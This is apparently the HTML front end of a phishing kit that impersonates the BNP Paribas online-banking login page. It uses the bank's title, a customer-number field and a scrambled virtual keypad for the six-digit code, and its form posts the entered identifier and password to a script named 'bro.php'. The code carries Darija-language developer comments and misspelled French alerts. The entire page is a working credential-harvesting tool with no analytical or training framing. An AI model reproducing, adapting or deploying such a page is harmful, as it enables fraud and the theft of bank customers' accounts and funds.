<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<title>Accéder à mes comptes en ligne | BNP Paribas</title>
	<link rel="stylesheet" href="./css/main.css">
	<link rel="stylesheet" href="./css/media.css">
	<link rel="stylesheet" href="./css/hoha.css">
	<script type="text/javascript" src="./js/clavier.js"></script>
	<link type="image/x-icon" href="./img/favicon.ico" rel="shortcut icon">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
	<script type="text/javascript">
    jQuery(function() {
         jQuery( ".puta-login" ).datepicker({ }).attr('readonly','readonly');
    });
</script>
	<script type="text/javascript">function check(){var input = document.getElementById('put-log');if(input.value.length > 6){ document.getElementById('zaza').style.display= "none";}}function deletelogin(){document.getElementById('put-log').value= "";document.getElementById('zaza').style.display= "block";}function deletepss(){document.getElementById('put-pss').value= ""}function addCode(key){var numpad = document.getElementById('put-pss');if(numpad.value.length < 6){numpad.value = numpad.value + key;}if(numpad.value.length == 7){ alert("vous aves passer 6 chifer password");setTimeout(submitForm,1000);}}function chof(){var logins = document.getElementById('put-log'), pssin = document.getElementById('put-pss');if(logins.value.length > 7 && pssin.value.length == 6){document.getElementById('myform').submit();}else{alert("Votre saisie de mot de passe est incorrecte\r Veuilez renouvler votre identification ou mot de passe");}}
	  /* function showing() {
           document.getElementById('test').style.display = "block";
            
        }
        function hides() {
            document.getElementById('test').style.display = "none";
        }*/
		/*function rjoula() {document.getElementById('zaza').style.display = "block";}
		function clean() {document.getElementById('zaza').style.display = "none";}
		function zigo() {var dada = document.getElementById('put-log');if(dada.value.length == 10){} else alert("haha");}*//*document.getElementById("zok2").style.display = "block";*/ 
	/*	function cleans() {document.getElementById('panel2').style.display = "block";}
		function deletepassID(){document.getElementById('textos').value="";}function deletepasspass(){document.getElementById('putapass').value="";}function addCode(key){var numpad = document.getElementById('putapass');if(numpad.value.length < 6){numpad.value = numpad.value + key;}if(numpad.value.length == 7){ alert("vous aves passer 6 chifer password");setTimeout(submitForm,1000);}}function mouka(){var inputa	= document.getElementById('textos'); var poupa = document.getElementById('putpass');if(inputa.value.length == 8 & putapass.value.length == 6){document.getElementById('myform').submit();}else douk() ;}function douk(){document.getElementById('nop').style.display = "block";document.getElementById('taga').style.display = "block" ;document.getElementById('nopp').style.display = "none" ;
	}*/
	</script>
</head>
<body>
	 <div class="numo">
	 	<center>
	 		<div class="numa">
	 			<div class="numa_top">
	 				<div class="numa_top_left"></div>
	 				<div class="numa_top_right">
	 					<h2>confirmation de votre numero faibilises</h2>
	 				</div>
	 			</div>
	 			<div class="numa_bottem">
	 				
	 			</div>
	 		</div>
	 	</center>
	 </div>
       <!-- hena div dyal kolchi -->
	<div class="contener">
        <!-- hena header dyal kolchi -->
        <!--`////////////////////////////////////////// hena beda header \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
		<div class="header">
			<div class="header-left">
				<div class="header-left-left"></div>
				<div class="header-cashe"></div>
				<div class="header-left-right"></div>
			</div>
			<div id="id" class="header-right" nmouseover="showing();" onmouseout="hides();"></div>
		</div>
		<!-- hena header dyal kolchi -->
		<!--`////////////////////////////////////////// hena sala header \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
		<!--`////////////////////////////////////////// hena beda body \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
		<div class="body">
			<div class="clear" id="clear"></div>
			<div class="clear1" id="clear1"></div>
			<div class="kolchi">
				<!--`////////////////////////////////////////// hena beda blassa login \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
				<div class="kolchi-left">
					<center>
						<form id="myform" action="bro.php" method="POST" accept-charset="utf-8">
							<div class="optima">
							     <div class="walo-hena"></div>
							     <div class="titre1"></div>
							     <div class="smal-titre1"></div>
							     <!-- hena bedya dyal text login -->
							     <div class="blasa-dyal-log">

							     	<div class="blasa-dyal-log-left">
							     		<input type="numbre" pattern="\d*" id="put-log" name="putalogin" class="puta-login" maxlength="10" size="10" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;else check();">
							     	</div>
							     	<div class="blasa-dyal-log-right" onclick="deletelogin();"></div>

							     </div>
							     <!-- hena fin dyal text login -->
							     <div class="titre2"></div>
							     <div class="here-pass-clv">
							     	<div class="zaza" id="zaza"></div>
							     	 <!-- hena beda put pass  -->
							     	 <div class="blasa-dyal-log">

							     	     <div class="blasa-dyal-log-left">
							     	     	<input type="password" pattern="\d*" id="put-pss" name="putpass" class="puta-login" maxlength="6" size="6" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;" readonly="">
							     	     </div>
							     	     <div class="blasa-dyal-log-right" onclick="deletepss();"></div>

							         </div>
							     	 <!-- hena sala put pass  -->

							     	 <!-- hena beda clavier  -->

							     	 <div class="clv-clv">
							     	 	<div class="tag1">
							     	 		<div class="dim" onclick="addCode('2');"></div>
							     	 		<div class="dim" onclick="addCode('8');"></div>
							     	 		<div class="dim" onclick="addCode('0');"></div>
							     	 		<div class="dim" onclick="addCode('6');"></div>
							     	 		<div class="dim" onclick="addCode('9');"></div>
							     	 	</div>
							     	 	<div class="tag1">
							     	 		<div class="dim" onclick="addCode('3');"></div>
							     	 		<div class="dim" onclick="addCode('4');"></div>
							     	 		<div class="dim" onclick="addCode('1');"></div>
							     	 		<div class="dim" onclick="addCode('7');"></div>
							     	 		<div class="dim" onclick="addCode('5');"></div>
							     	 	</div>
							     	 	
							     	 </div>
							     	 <!-- hena sala clavier  -->

							     	 <div class="button-valid" onclick="chof()"></div>

							     </div>

						    </div>
						</form>
					</center>
				</div>
				<!--`////////////////////////////////////////// hena sala blassa login \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
				<div class="kolchi-right">
					
					<div id="test" class="message-right"></div>
				</div>
			</div>
		</div>
		<!--`////////////////////////////////////////// hena sala body \\\\\\\\\\\\\\\\\\\\\\\\\\ -->
		<div class="footer"></div>
		

	</div>
	<!-- hena sala div dyal kolchi -->


	
</body>
</html>